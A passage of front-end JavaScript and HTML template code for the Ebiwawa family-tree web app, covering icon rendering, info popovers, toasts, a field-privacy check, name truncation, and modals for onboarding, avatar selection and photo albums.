            lock: '<path d="M5 11m0 2a2 2 0 0 1 2 -2h10a2 2 0 0 1 2 2v6a2 2 0 0 1 -2 2h-10a2 2 0 0 1 -2 -2z" /><path d="M8 11v-4a4 4 0 1 1 8 0v4" />',
            world: '<path d="M12 12m-9 0a9 9 0 1 0 18 0a9 9 0 1 0 -18 0" /><path d="M3.6 9h16.8" /><path d="M3.6 15h16.8" /><path d="M11.5 3a17 17 0 0 0 0 18" /><path d="M12.5 3a17 17 0 0 1 0 18" />',
            x: '<path d="M18 6l-12 12" /><path d="M6 6l12 12" />',
            pencil: '<path d="M4 20h4l10.5 -10.5a2.828 2.828 0 1 0 -4 -4l-10.5 10.5v4" /><path d="M13.5 6.5l4 4" />',
            share: '<path d="M6 12m-3 0a3 3 0 1 0 6 0a3 3 0 1 0 -6 0" /><path d="M18 6m-3 0a3 3 0 1 0 6 0a3 3 0 1 0 -6 0" /><path d="M18 18m-3 0a3 3 0 1 0 6 0a3 3 0 1 0 -6 0" /><path d="M8.7 10.7l6.6 -3.4" /><path d="M8.7 13.3l6.6 3.4" />',
            eye: '<path d="M10 12a2 2 0 1 0 4 0a2 2 0 0 0 -4 0" /><path d="M21 12c-2.4 4 -5.4 6 -9 6c-3.6 0 -6.6 -2 -9 -6c2.4 -4 5.4 -6 9 -6c3.6 0 6.6 2 9 6" />',
            'chevron-left': '<path d="M15 6l-6 6l6 6" />',
            'chevron-right': '<path d="M9 6l6 6l-6 6" />',
            'chevron-down': '<path d="M6 9l6 6l6 -6" />',
            'chevron-up': '<path d="M6 15l6 -6l6 6" />',
            'menu-2': '<path d="M4 6l16 0" /><path d="M4 12l16 0" /><path d="M4 18l16 0" />',
            'layout-grid': '<path d="M4 4m0 1a1 1 0 0 1 1 -1h4a1 1 0 0 1 1 1v4a1 1 0 0 1 -1 1h-4a1 1 0 0 1 -1 -1z" /><path d="M14 4m0 1a1 1 0 0 1 1 -1h4a1 1 0 0 1 1 1v4a1 1 0 0 1 -1 1h-4a1 1 0 0 1 -1 -1z" /><path d="M4 14m0 1a1 1 0 0 1 1 -1h4a1 1 0 0 1 1 1v4a1 1 0 0 1 -1 1h-4a1 1 0 0 1 -1 -1z" /><path d="M14 14m0 1a1 1 0 0 1 1 -1h4a1 1 0 0 1 1 1v4a1 1 0 0 1 -1 1h-4a1 1 0 0 1 -1 -1z" />',
            list: '<path d="M9 6l11 0" /><path d="M9 12l11 0" /><path d="M9 18l11 0" /><path d="M5 6l0 .01" /><path d="M5 12l0 .01" /><path d="M5 18l0 .01" />',
            'dots-vertical': '<path d="M12 12m-1 0a1 1 0 1 0 2 0a1 1 0 1 0 -2 0" /><path d="M12 19m-1 0a1 1 0 1 0 2 0a1 1 0 1 0 -2 0" /><path d="M12 5m-1 0a1 1 0 1 0 2 0a1 1 0 1 0 -2 0" />',
            archive: '<path d="M3 4m0 2a2 2 0 0 1 2 -2h14a2 2 0 0 1 2 2v0a2 2 0 0 1 -2 2h-14a2 2 0 0 1 -2 -2z" /><path d="M5 8v10a2 2 0 0 0 2 2h10a2 2 0 0 0 2 -2v-10" /><path d="M10 12l4 0" />',
            paperclip: '<path d="M15 7l-6.5 6.5a1.5 1.5 0 0 0 3 3l6.5 -6.5a3 3 0 0 0 -6 -6l-6.5 6.5a4.5 4.5 0 0 0 9 9l6.5 -6.5" />',
            wand: '<path d="M6 21l15 -15l-3 -3l-15 15l3 3" /><path d="M15 6l3 3" /><path d="M9 3a2 2 0 0 0 2 2a2 2 0 0 0 -2 2a2 2 0 0 0 -2 -2a2 2 0 0 0 2 -2" /><path d="M19 13a2 2 0 0 0 2 2a2 2 0 0 0 -2 2a2 2 0 0 0 -2 -2a2 2 0 0 0 2 -2" />',
            microphone: '<path d="M9 2m0 3a3 3 0 0 1 3 -3h0a3 3 0 0 1 3 3v5a3 3 0 0 1 -3 3h0a3 3 0 0 1 -3 -3z" /><path d="M5 10a7 7 0 0 0 14 0" /><path d="M8 21l8 0" /><path d="M12 17l0 4" />',
            bookmark: '<path d="M18 7v14l-6 -4l-6 4v-14a4 4 0 0 1 4 -4h4a4 4 0 0 1 4 4z" />',
            play: '<path d="M7 4v16l13 -8z" />',
            'shield-check': '<path d="M11.46 20.846a12 12 0 0 1 -7.96 -14.846a12 12 0 0 0 8.5 -3a12 12 0 0 0 8.5 3a12 12 0 0 1 -.09 7.06" /><path d="M15 19l2 2l4 -4" />',
            'info-circle': '<path d="M12 12m-9 0a9 9 0 1 0 18 0a9 9 0 1 0 -18 0" /><path d="M12 9h.01" /><path d="M11 12h1v4h1" />',
        };
        // preserveColor: true → omit .ebw-icon so stroke="currentColor"
        // inherits from parent (used for icons inside colored buttons like
        // Delete-red, primary-white, etc.). Default renders warm-neutral.
        function tablerIcon(name, opts = {}) {
            const size = opts.size || 18;
            const baseClass = opts.preserveColor ? '' : 'ebw-icon';
            const extraClass = opts.className ? (baseClass ? ' ' : '') + opts.className : '';
            const cls = baseClass + extraClass;
            const paths = _TABLER_ICON_PATHS[name] || '';
            return `<svg xmlns="http://www.w3.org/2000/svg" width="${size}" height="${size}" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round"${cls ? ` class="${cls}"` : ''} aria-hidden="true">${paths}</svg>`;
        }

        // Image-load-fail fallback. Called inline via `onerror` on <img>
        // tags that render signed-URL / external assets (avatars, post
        // photos) — when those 404 or CORS-fail, a broken-image icon is
        // never user-visible. Replaces the img with:
        //   kind='avatar': the initials text (parent already has the
        //                  rounded/bg styling of the avatar circle).
        //   kind='photo':  a Tabler photo icon inside a subtle gray box
        //                  sized to the img's aspect.
        function _imgFallback(imgEl, kind, opts) {
            opts = opts || {};
            const parent = imgEl && imgEl.parentElement;
            if (!parent) { if (imgEl) imgEl.remove(); return; }
            if (kind === 'avatar') {
                // Parent div already has bg-primary + rounded-full styling.
                parent.textContent = opts.initials || '?';
            } else {
                // kind === 'photo' (or anything else) → generic image placeholder.
                const size = opts.size || 48;
                const wrap = document.createElement('div');
                wrap.className = 'w-full flex items-center justify-center bg-gray-100 rounded-lg text-gray-400 py-12';
                wrap.innerHTML = tablerIcon('photo', { size, preserveColor: true });
                parent.replaceChild(wrap, imgEl);
            }
        }
        window._imgFallback = _imgFallback;

        function ebwInfoGlyph(id, copy) {
            return `<button
                type="button"
                class="ebw-info-glyph"
                aria-label="What is this?"
                onclick="ebwToggleInfoPopover(event, '${id}', ${JSON.stringify(copy).replace(/"/g, '&quot;')})">ⓘ</button>`;
        }
        window.ebwInfoGlyph = ebwInfoGlyph;
        function ebwToggleInfoPopover(event, id, copy) {
            if (event) { event.preventDefault(); event.stopPropagation(); }
            // Remove any open popover first (single-popover semantics).
            const existing = document.getElementById('ebw-info-popover');
            if (existing) {
                const openId = existing.getAttribute('data-glyph-id');
                existing.remove();
                if (openId === id) return; // second click on same glyph = close
            }
            const trigger = event && event.currentTarget;
            if (!trigger) return;
            const rect = trigger.getBoundingClientRect();
            const pop = document.createElement('div');
            pop.id = 'ebw-info-popover';
            pop.className = 'ebw-info-popover';
            pop.setAttribute('data-glyph-id', id);
            pop.setAttribute('role', 'dialog');
            pop.style.top = `${window.scrollY + rect.bottom + 8}px`;
            pop.style.left = `${Math.max(8, window.scrollX + rect.left - 100)}px`;
            pop.innerHTML = `
                <div class="ebw-info-popover-body">${escapeHtml(copy)}</div>
                <div class="ebw-info-popover-footer">
                    <a href="#" onclick="event.preventDefault(); openHelpDrawer();" class="text-primary hover:underline">Learn more →</a>
                    <button type="button" onclick="document.getElementById('ebw-info-popover')?.remove()" class="ebw-info-popover-close" aria-label="Dismiss">✕</button>
                </div>
            `;
            document.body.appendChild(pop);
            // Dismiss on outside click or Escape.
            setTimeout(() => {
                const off = (ev) => {
                    if (pop.contains(ev.target)) return;
                    if (ev.type === 'keydown' && ev.key !== 'Escape') return;
                    pop.remove();
                    document.removeEventListener('click', off, true);
                    document.removeEventListener('keydown', off, true);
                };
                document.addEventListener('click', off, true);
                document.addEventListener('keydown', off, true);
            }, 0);
        }
        window.ebwToggleInfoPopover = ebwToggleInfoPopover;

        // Tier 1 of the How-To stack. Shared markup for rich empty states —
        // icon + heading + one-liner + primary action (optional) + Learn more
        // link (optional). Uses inline classes so it works everywhere no
        // matter the container's existing CSS.
        // Quiet inline success toast — replaces alert()s on success paths
        // (destructive confirm()s are unchanged). Auto-dismisses ~2s.
        // Single-toast semantics: opening a new one removes any prior.
        // Accessible via role="status" + aria-live="polite".
        function _ebwToast(message, opts) {
            const tone = (opts && opts.tone) || 'success';
            const prior = document.getElementById('_ebw-toast');
            if (prior) prior.remove();
            const toast = document.createElement('div');
            toast.id = '_ebw-toast';
            const bg = tone === 'error' ? 'bg-red-600' : 'bg-green-600';
            toast.className = `fixed top-4 left-1/2 -translate-x-1/2 z-[100] ${bg} text-white text-sm font-medium px-4 py-2 rounded-md shadow-lg pointer-events-none transition-opacity duration-300 opacity-0 max-w-[calc(100vw-2rem)] text-center`;
            toast.setAttribute('role', 'status');
            toast.setAttribute('aria-live', 'polite');
            toast.textContent = message;
            document.body.appendChild(toast);
            requestAnimationFrame(() => { toast.classList.remove('opacity-0'); });
            setTimeout(() => {
                toast.classList.add('opacity-0');
                setTimeout(() => { if (toast.parentNode) toast.remove(); }, 350);
            }, 2000);
        }
        window._ebwToast = _ebwToast;

        function ebwEmptyState(opts) {
            const { icon, heading, body, primaryAction, learnMoreAnchor } = opts || {};
            const primaryHtml = primaryAction
                ? `<button onclick="${primaryAction.onclick}" class="mt-4 inline-flex items-center gap-2 px-4 py-2 text-sm font-semibold text-white rounded-md bg-primary hover:bg-opacity-90">${escapeHtml(primaryAction.label)}</button>`
                : '';
            // learnMoreAnchor is either a fragment (e.g. 'family-tree') OR
            // omitted. Opens the help drawer to the anchor rather than a
            // new tab, keeping the user in-app.
            const learnMoreHtml = learnMoreAnchor
                ? `<div class="mt-3 text-xs"><a href="#" onclick="openHelpDrawer(); return false;" class="text-primary hover:underline">Learn more in Help →</a></div>`
                : '';
            // Icon param accepts a Tabler name (string in the icon dictionary),
            // renders at 40px in warm-neutral color. Falls back to a hand-icon
            // if the passed name isn't registered.
            const iconName = (icon && _TABLER_ICON_PATHS[icon]) ? icon : 'user';
            const iconHtml = `<div class="mb-3 flex justify-center" aria-hidden="true">${tablerIcon(iconName, { size: 40 })}</div>`;
            return `
                <div class="ebw-empty-state-card text-center py-10 px-6">
                    ${iconHtml}
                    <h3 class="text-lg font-semibold text-gray-800 mb-2">${escapeHtml(heading || '')}</h3>
                    <p class="text-sm text-gray-600 max-w-md mx-auto">${escapeHtml(body || '')}</p>
                    ${primaryHtml}
                    ${learnMoreHtml}
                </div>
            `;
        }
        window.ebwEmptyState = ebwEmptyState;

        function nameInitials(name) {
            if (!name || typeof name !== 'string') return '?';
            const words = name.trim().split(/\s+/).filter(Boolean);
            if (words.length === 0) return '?';
            if (words.length === 1) {
                return words[0].slice(0, 2).toUpperCase();
            }
            return (words[0][0] + words[words.length - 1][0]).toUpperCase();
        }
        window.nameInitials = nameInitials;
        // Two forms of "viewer identity" reach the render sites depending on
        // path: the FTV's canonical `_ftvViewerPersonId` (Person id), or the
        // detail/profile paths which have only `currentUserNeo4jId` (User id).
        // canViewField accepts either — pass whichever is at hand.
        function canViewField(viewer, person, field, opts) {
            if (!person) return false;
            if (field === 'name' || field === 'relationship') return true;
            if (!personIsPrivate(person)) return true;
            // Owner sees everything on their own Person.
            const viewerPersonId = viewer;
            const viewerUserId = (opts && opts.viewerUserId) != null
                ? opts.viewerUserId
                : (typeof appState !== 'undefined' ? appState.currentUserNeo4jId : null);
            if (viewerPersonId != null && person.id != null && viewerPersonId === person.id) {
                return true;
            }
            if (viewerUserId != null && person.claimed_by_user_id != null
                && person.claimed_by_user_id === viewerUserId) {
                return true;
            }
            // Deceased: controller (Person's creator or tree creator) sees
            // unfiltered when explicitly signalled.
            if (opts && opts.viewerControlsDeceased) return true;
            return false;
        }
        window.canViewField = canViewField;
        window.personIsPrivate = personIsPrivate;

        // Actual pixel measurement of text via a shared canvas — cheaper than
        // rendering-then-measuring via SVG.getBBox, and works BEFORE the text
        // is in the DOM. Used by the FTV to truncate names to card width
        // without guessing at font metrics (Outfit / Inter have wide capitals
        // that make character-width heuristics wrong for African given names
        // like "Oluwatoyin" or "Oluwadamilola").
        function measureTextWidth(text, fontSize, fontWeight, fontFamily) {
            if (!measureTextWidth._ctx) {
                const c = document.createElement('canvas');
                measureTextWidth._ctx = c.getContext('2d');
            }
            const ctx = measureTextWidth._ctx;
            ctx.font = `${fontWeight || 400} ${fontSize}px ${fontFamily || 'Inter, sans-serif'}`;
            return ctx.measureText(text).width;
        }
        // Fit a person's name to a pixel budget, preferring meaningful
        // truncation over mid-word cuts. African names run long
        // (Oluwadamilola, Oluwatoyin) so a naive char-by-char truncation
        // would produce awkward "Oluwadamil…" cards; this prefers
        // "Oluwadamilola O." (first name + last initial) when the full
        // "First Last" doesn't fit.
        //
        // Order of attempts:
        //   1. "First Middle Last Suffix" as given
        //   2. "First Last" (drop middle, drop suffix)
        //   3. "First L." (first + last initial)
        //   4. "First" (first name alone)
        //   5. Ellipsis-truncated first name if even that overflows
        function fitPersonNameToWidth(person, maxWidth, fontSize, fontWeight, fontFamily) {
            const first = (person.first_name || '').trim();
            const middle = (person.middle_name || '').trim();
            const last = (person.last_name || '').trim();
            const suffix = (person.suffix || '').trim();
            const fits = (s) => measureTextWidth(s, fontSize, fontWeight, fontFamily) <= maxWidth;

            const attempts = [];
            if (first && last) attempts.push(`${first}${middle ? ' ' + middle : ''} ${last}${suffix ? ' ' + suffix : ''}`);
            if (first && last) attempts.push(`${first} ${last}`);
            if (first && last) attempts.push(`${first} ${last.charAt(0)}.`);
            if (first) attempts.push(first);
            if (last) attempts.push(last);

            for (const candidate of attempts) {
                if (fits(candidate)) return candidate;
            }

            // Last resort: single-char truncation of whichever we have.
            const raw = attempts[attempts.length - 1] || (first || last || '');
            let truncated = raw;
            while (truncated.length > 1
                   && !fits(truncated + '…')) {
                truncated = truncated.slice(0, -1).trimEnd();
            }
            return truncated + '…';
        }

        // Firebase init happens in services/firebase.js on module import —
        // `db` is imported at the top of this file. If init fails, that
        // module throws loudly rather than silently null-init'ing db (which
        // is what the pre-v9 try/catch used to do); the app can't run
        // without Firebase so a loud failure is the honest behavior.

        // --- UI COMPONENTS ---

        // Onboarding Wizard Component
        function OnboardingWizard() {
            return `
                <div id="onboarding-wizard" class="auth-centered-layout">
                    <div class="auth-centered-content">
                        <div class="w-full max-w-2xl">
                            <div class="text-center mb-6">
                                <img src="ebiwawa-logo.svg" alt="Ebiwawa" class="mx-auto mb-3 auth-logo" style="object-fit: contain;">
                                <p class="auth-tagline" style="font-family: 'Outfit', sans-serif;">
                                    Tell us about you so we can connect you with family.
                                </p>
                            </div>

                            <!-- Progress Bar -->
                            <div class="mb-6">
                                <div class="flex justify-between mb-2">
                                    <span id="progress-text" class="text-sm font-medium text-gray-700">Step 1 of 4</span>
                                    <span class="text-sm text-gray-500"><span id="progress-percent">25</span>%</span>
                                </div>
                                <div class="w-full bg-gray-200 rounded-full h-2">
                                    <div id="progress-bar" class="bg-primary h-2 rounded-full transition-all duration-300" style="width: 25%"></div>
                                </div>
                            </div>

                            <!-- Step Container -->
                            <div id="onboarding-steps" class="min-h-[400px]">
                                <!-- Steps will be rendered here -->
                            </div>

                            <!-- Navigation Buttons -->
                            <div class="flex justify-between mt-6 pt-6 border-t">
                                <button id="prev-btn" onclick="previousOnboardingStep()" class="btn btn-secondary" style="display: none;">
                                    &larr; Back
                                </button>
                                <button id="skip-btn" onclick="skipCurrentStep()" class="btn btn-ghost" style="display: none;">
                                    Skip remaining steps
                                </button>
                                <button id="next-btn" onclick="nextOnboardingStep()" class="btn btn-primary">
                                    Continue &rarr;
                                </button>
                            </div>

                            <div id="onboarding-error" class="mt-4 text-sm text-center text-error"></div>
                            <!-- Populated by completeOnboarding when /onboarding/complete returns 409 (tree name taken).
                                 Lives at the wizard level (not inside any step) so the chips are visible on whichever
                                 step the user was on when they clicked Complete. -->
                            <div id="tree-name-alternatives" class="mt-4 hidden"></div>
                        </div>
                    </div>
                </div>

                <!-- Avatar Picker Modal. Hidden via the 'hidden' class (display:none)
                     until showAvatarPicker() swaps it to 'flex'. Previous implementation
                     used opacity-0 + flex layout, which kept the 8 DiceBear <img> tags
                     in the layout (and triggered 8 network requests) on every Step 1
                     render, producing the brief flash users reported. -->
                <div id="avatar-picker-modal" class="modal-overlay hidden fixed inset-0 z-50 items-center justify-center bg-black bg-opacity-50 opacity-0 transition-opacity duration-300 pointer-events-none">
                    <div class="w-full max-w-2xl p-8 space-y-6 rounded-lg shadow-xl bg-surface transform translate-y-10 transition-transform duration-300">
                        <h2 class="text-2xl font-bold">Choose Your Avatar</h2>
                        <div class="grid grid-cols-3 sm:grid-cols-4 gap-4">
                            <div class="cursor-pointer hover:opacity-75 transition-opacity" onclick="selectDiceBearAvatar('Amara', 'd08b5b')">
                                <img src="https://api.dicebear.com/7.x/avataaars/svg?seed=Amara&skinColor=d08b5b&mouth=default,smile&eyes=default,happy&accessoriesProbability=0" alt="Avatar Amara" loading="lazy" decoding="async" class="w-full h-auto rounded-lg">
                            </div>
                            <div class="cursor-pointer hover:opacity-75 transition-opacity" onclick="selectDiceBearAvatar('Kwame', '8d5524')">
                                <img src="https://api.dicebear.com/7.x/avataaars/svg?seed=Kwame&skinColor=8d5524&mouth=default,smile&eyes=default,happy&accessoriesProbability=0" alt="Avatar Kwame" loading="lazy" decoding="async" class="w-full h-auto rounded-lg">
                            </div>
                            <div class="cursor-pointer hover:opacity-75 transition-opacity" onclick="selectDiceBearAvatar('Zuri', 'ae5d29')">
                                <img src="https://api.dicebear.com/7.x/avataaars/svg?seed=Zuri&skinColor=ae5d29&mouth=default,smile&eyes=default,happy&accessoriesProbability=0" alt="Avatar Zuri" loading="lazy" decoding="async" class="w-full h-auto rounded-lg">
                            </div>
                            <div class="cursor-pointer hover:opacity-75 transition-opacity" onclick="selectDiceBearAvatar('Olu', '614335')">
                                <img src="https://api.dicebear.com/7.x/avataaars/svg?seed=Olu&skinColor=614335&mouth=default,smile&eyes=default,happy&accessoriesProbability=0" alt="Avatar Olu" loading="lazy" decoding="async" class="w-full h-auto rounded-lg">
                            </div>
                            <div class="cursor-pointer hover:opacity-75 transition-opacity" onclick="selectDiceBearAvatar('Nia', '8d5524')">
                                <img src="https://api.dicebear.com/7.x/avataaars/svg?seed=Nia&skinColor=8d5524&mouth=default,smile&eyes=default,happy&accessoriesProbability=0" alt="Avatar Nia" loading="lazy" decoding="async" class="w-full h-auto rounded-lg">
                            </div>
                            <div class="cursor-pointer hover:opacity-75 transition-opacity" onclick="selectDiceBearAvatar('Kofi', 'ae5d29')">
                                <img src="https://api.dicebear.com/7.x/avataaars/svg?seed=Kofi&skinColor=ae5d29&mouth=default,smile&eyes=default,happy&accessoriesProbability=0" alt="Avatar Kofi" loading="lazy" decoding="async" class="w-full h-auto rounded-lg">
                            </div>
                            <div class="cursor-pointer hover:opacity-75 transition-opacity" onclick="selectDiceBearAvatar('Aisha', '614335')">
                                <img src="https://api.dicebear.com/7.x/avataaars/svg?seed=Aisha&skinColor=614335&mouth=default,smile&eyes=default,happy&accessoriesProbability=0" alt="Avatar Aisha" loading="lazy" decoding="async" class="w-full h-auto rounded-lg">
                            </div>
                            <div class="cursor-pointer hover:opacity-75 transition-opacity" onclick="selectDiceBearAvatar('Tendai', '3c2415')">
                                <img src="https://api.dicebear.com/7.x/avataaars/svg?seed=Tendai&skinColor=3c2415&mouth=default,smile&eyes=default,happy&accessoriesProbability=0" alt="Avatar Tendai" loading="lazy" decoding="async" class="w-full h-auto rounded-lg">
                            </div>
                        </div>
                        <div class="flex justify-end">
                            <button type="button" onclick="closeAvatarPicker()" class="btn btn-secondary">Cancel</button>
                        </div>
                    </div>
                </div>

                <!-- Profile Completion Modal. Same flash pattern as the avatar picker:
                     opacity-0 + flex in the layout, then transition-opacity animating
                     from the browser's default value (1) down to 0 on first paint, which
                     visibly flashes the modal for ~1 frame. Initial state is now hidden
                     (display:none) so the modal isn't in the layout until explicitly shown. -->
                <div id="profile-completion-modal" class="modal-overlay hidden fixed inset-0 z-50 items-center justify-center bg-black bg-opacity-50 opacity-0 transition-opacity duration-300 pointer-events-none">
                    <div class="w-full max-w-2xl p-8 space-y-6 rounded-lg shadow-xl bg-surface transform translate-y-10 transition-transform duration-300">
                        <div class="flex items-center justify-between">
                            <h2 class="text-2xl font-bold text-gray-800">Your family tree is growing! 🌱</h2>
                            <button onclick="closeProfileCompletionModal()" class="text-gray-400 hover:text-gray-600">
                                ${tablerIcon('x', { size: 24, preserveColor: true })}
                            </button>
                        </div>
                        <p class="text-gray-600">You've created your foundation! Now let's add the rich details that make your legacy unique.</p>

                        <!-- Progress Bar -->
                        <div class="bg-gray-200 rounded-full h-3 mb-4">
                            <div class="bg-primary h-3 rounded-full" style="width: 45%"></div>
                        </div>
                        <p class="text-sm text-gray-600 text-center mb-6">Profile Completion: 45%</p>

                        <!-- Quick Actions -->
                        <div class="grid grid-cols-1 sm:grid-cols-2 gap-4">
                            <div onclick="navigateToProfileFromModal('profile-view')" class="p-4 border border-gray-200 rounded-lg hover:border-primary hover:shadow-md transition-all cursor-pointer">
                                <h3 class="font-semibold text-gray-800 mb-2">Add Your Heritage</h3>
                                <p class="text-sm text-gray-600">Share your ethnic group(s) and tribal identity</p>
                            </div>
                            <div onclick="navigateToProfileFromModal('profile-view')" class="p-4 border border-gray-200 rounded-lg hover:border-primary hover:shadow-md transition-all cursor-pointer">
                                <h3 class="font-semibold text-gray-800 mb-2">Share Your Story</h3>
                                <p class="text-sm text-gray-600">Write a brief introduction about yourself</p>
                            </div>
                            <div onclick="navigateToProfileFromModal('profile-view')" class="p-4 border border-gray-200 rounded-lg hover:border-primary hover:shadow-md transition-all cursor-pointer">
                                <h3 class="font-semibold text-gray-800 mb-2">Tell Us More</h3>
                                <p class="text-sm text-gray-600">Add hometown, languages, and family role</p>
                            </div>
                            <div onclick="navigateToProfileFromModal('family-tree-view')" class="p-4 border border-gray-200 rounded-lg hover:border-primary hover:shadow-md transition-all cursor-pointer">
                                <h3 class="font-semibold text-gray-800 mb-2">Honor Your Ancestors</h3>
                                <p class="text-sm text-gray-600">Add more details about your family members</p>
                            </div>
                        </div>

                        <!-- Buttons -->
                        <div class="flex flex-col gap-3 pt-4">
                            <button type="button" onclick="navigateToProfileFromModal('profile-view')" class="btn btn-primary w-full">Complete My Profile Now</button>
                            <button type="button" onclick="closeProfileCompletionModal()" class="text-gray-500 hover:text-gray-700 text-sm text-center">I'll do this later</button>
                        </div>
                    </div>
                </div>
            `;
        }

        function closeProfileCompletionModal() {
            const modal = document.getElementById('profile-completion-modal');
            if (modal) {
                modal.classList.add('hidden', 'opacity-0', 'pointer-events-none');
                modal.classList.remove('flex', 'opacity-100');
            }
            // Mark as shown so it doesn't appear again
            localStorage.setItem('profileCompletionModalShown', 'true');
            localStorage.removeItem('showProfileCompletionModal');
        }

        function navigateToProfileFromModal(targetView) {
            // Close the profile completion modal first
            closeProfileCompletionModal();

            // Navigate to the requested view
            setTimeout(() => {
                navigateToView(targetView);
            }, 300); // Small delay to allow modal close animation
        }

        function showProfileCompletionModal() {
            console.log('showProfileCompletionModal called');
            console.log('showProfileCompletionModal flag:', localStorage.getItem('showProfileCompletionModal'));
            console.log('profileCompletionModalShown flag:', localStorage.getItem('profileCompletionModalShown'));

            // Check if should show
            if (localStorage.getItem('showProfileCompletionModal') !== 'true') {
                console.log('Modal NOT showing: showProfileCompletionModal flag not set');
                return;
            }

            // Check if already shown
            if (localStorage.getItem('profileCompletionModalShown') === 'true') {
                console.log('Modal NOT showing: already shown before');
                return;
            }

            const modal = document.getElementById('profile-completion-modal');
            console.log('Modal element found:', modal ? 'YES' : 'NO');

            if (modal) {
                console.log('Showing profile completion modal');
                modal.classList.remove('hidden', 'opacity-0', 'pointer-events-none');
                modal.classList.add('flex', 'opacity-100');
                // Don't set profileCompletionModalShown here - only when user dismisses it
            } else {
                console.error('Profile completion modal element not found in DOM!');
            }
        }

        function CreateAlbumModal() {
            return `
                <div id="create-album-modal" class="modal-overlay fixed inset-0 z-50 flex items-start md:items-center justify-center p-4 bg-black bg-opacity-50 opacity-0 transition-opacity duration-300 pointer-events-none overflow-y-auto overflow-x-hidden">
                    <div class="w-full max-w-lg mx-auto my-8 p-4 md:p-8 space-y-4 md:space-y-6 rounded-lg shadow-xl bg-surface transform translate-y-10 transition-transform duration-300">
                        <h2 class="text-2xl font-bold">Create New Photo Album</h2>
                        <form id="create-album-form" class="space-y-4">
                            <div><label for="album-title" class="text-sm font-medium text-text-secondary">Album Title</label><input id="album-title" type="text" required class="w-full px-3 py-2 mt-1 border border-gray-300 rounded-md"></div>
                            <div><label for="album-description" class="text-sm font-medium text-text-secondary">Description</label><textarea id="album-description" class="w-full px-3 py-2 mt-1 border border-gray-300 rounded-md"></textarea></div>
                            <div id="create-album-error" class="text-sm text-center text-error"></div>
                            <div class="flex justify-end pt-4 space-x-4">
                                <button type="button" onclick="closeModal('create-album-modal')" class="btn btn-secondary">Cancel</button>
                                <button type="submit" class="btn btn-primary">Create Album</button>
                            </div>
                        </form>
                    </div>
                </div>
            `;
        }

        // Prompt 15: album share picker. Follows the RecipientPickerModal
        // shape (fixed inset-4 md:inset-16 max-w-md mx-auto) so we
        // sidestep every vh/dvh/flex-1 iOS Safari quirk — the card is a
        // real rectangle with browser-laid-out bounds. Rendered as a
        // sibling of PhotoLightboxModal at #modal-container level so
        // its `fixed inset-0` backdrop stays viewport-relative even if
        // an ancestor uses `transform`.
        //
        // Data flow:
        //   - Open: fetch tree members (loadTreeMembersForChat) + existing
        //     shares (GET /albums/<id>/shares). Prefill each row's
        //     three-state (Not shared / Viewer / Contributor).
        //   - "Everyone in my family" is a UI shortcut that flips all
        //     rows to Viewer — it expands to individual edges on save,
        //     no family-wide state on the graph.
        //   - Save: diff current vs desired → POSTs + DELETEs. Progress
        //     on the button; per-row failures reported inline; global
        //     failure surfaces in the error region.
        function ShareAlbumModal() {
            return `
                <div id="share-album-modal" class="hidden">
                    <div class="fixed inset-0 z-[59] bg-black bg-opacity-50"></div>
                    <div class="fixed inset-4 md:inset-16 z-[60] max-w-md mx-auto bg-surface rounded-lg shadow-xl flex flex-col overflow-hidden"
                         data-album-id="">
                        <div class="flex items-center justify-between px-4 py-3 border-b bg-surface flex-shrink-0">
                            <div class="min-w-0">
                                <h3 class="font-semibold text-lg truncate">Share album</h3>
                                <p id="share-album-subtitle" class="text-xs text-gray-500 truncate"></p>
                            </div>
                            <button type="button" onclick="closeShareAlbumModal()"
                                class="p-2 -mr-2 text-gray-500 hover:text-gray-700 hover:bg-gray-100 rounded-lg flex-shrink-0"
                                aria-label="Close">
                                ${tablerIcon('x', { size: 20, preserveColor: true })}
                            </button>
                        </div>
                        <div id="share-album-error" class="hidden px-4 py-2 bg-red-50 text-red-700 text-sm border-b border-red-200 flex-shrink-0"></div>
                        <div id="share-album-list" class="overflow-y-auto flex-1 min-h-0 px-2 py-1" style="-webkit-overflow-scrolling: touch; overscroll-behavior: contain;">
                            <p class="text-sm text-gray-500 text-center py-8">Loading family members…</p>
                        </div>
                        <div class="px-4 py-3 border-t bg-surface flex items-center justify-end gap-2 flex-shrink-0">
                            <button type="button" onclick="closeShareAlbumModal()"
                                class="px-4 py-2 text-sm font-semibold text-gray-700 bg-gray-100 rounded-md hover:bg-gray-200">
                                Cancel
                            </button>
                            <button type="button" id="share-album-save-btn" onclick="handleSaveAlbumShares()"
                                class="px-4 py-2 text-sm font-semibold text-white bg-primary rounded-md hover:bg-opacity-90 disabled:opacity-50 disabled:cursor-not-allowed">
                                Save
                            </button>
                        </div>
                    </div>
                </div>
            `;
        }

        function RenameAlbumModal() {
            // Same 2-field form as CreateAlbum. Title + description are
            // prefilled at open time by openRenameAlbumFromEl reading
            // data-album-title / data-album-description off the invoking
            // element. Album id is stored on the form itself via
            // data-album-id so handleRenameAlbum can read it without a
            // separate module-level variable. Album title/description
            // never travel through a JS string — the escape-hygiene
            // pattern from Prompt 4.
            return `
                <div id="rename-album-modal" class="modal-overlay fixed inset-0 z-50 flex items-start md:items-center justify-center p-4 bg-black bg-opacity-50 opacity-0 transition-opacity duration-300 pointer-events-none overflow-y-auto overflow-x-hidden">
                    <div class="w-full max-w-lg mx-auto my-8 p-4 md:p-8 space-y-4 md:space-y-6 rounded-lg shadow-xl bg-surface transform translate-y-10 transition-transform duration-300">
                        <h2 class="text-2xl font-bold">Rename Album</h2>
                        <form id="rename-album-form" class="space-y-4" data-album-id="">
                            <div><label for="rename-album-title" class="text-sm font-medium text-text-secondary">Album Title</label><input id="rename-album-title" type="text" required maxlength="120" class="w-full px-3 py-2 mt-1 border border-gray-300 rounded-md"></div>
                            <div><label for="rename-album-description" class="text-sm font-medium text-text-secondary">Description</label><textarea id="rename-album-description" maxlength="1000" class="w-full px-3 py-2 mt-1 border border-gray-300 rounded-md"></textarea></div>
                            <div id="rename-album-error" class="text-sm text-center text-error"></div>
                            <div class="flex justify-end pt-4 space-x-4">
                                <button type="button" onclick="closeModal('rename-album-modal')" class="btn btn-secondary">Cancel</button>
                                <button type="submit" class="btn btn-primary">Save</button>
                            </div>
                        </form>
                    </div>
                </div>
            `;
        }

        function CreatePostModal() {
            return `
                <div id="create-post-modal" class="modal-overlay fixed inset-0 z-50 flex items-start md:items-center justify-center p-4 bg-black bg-opacity-50 opacity-0 transition-opacity duration-300 pointer-events-none overflow-y-auto overflow-x-hidden">
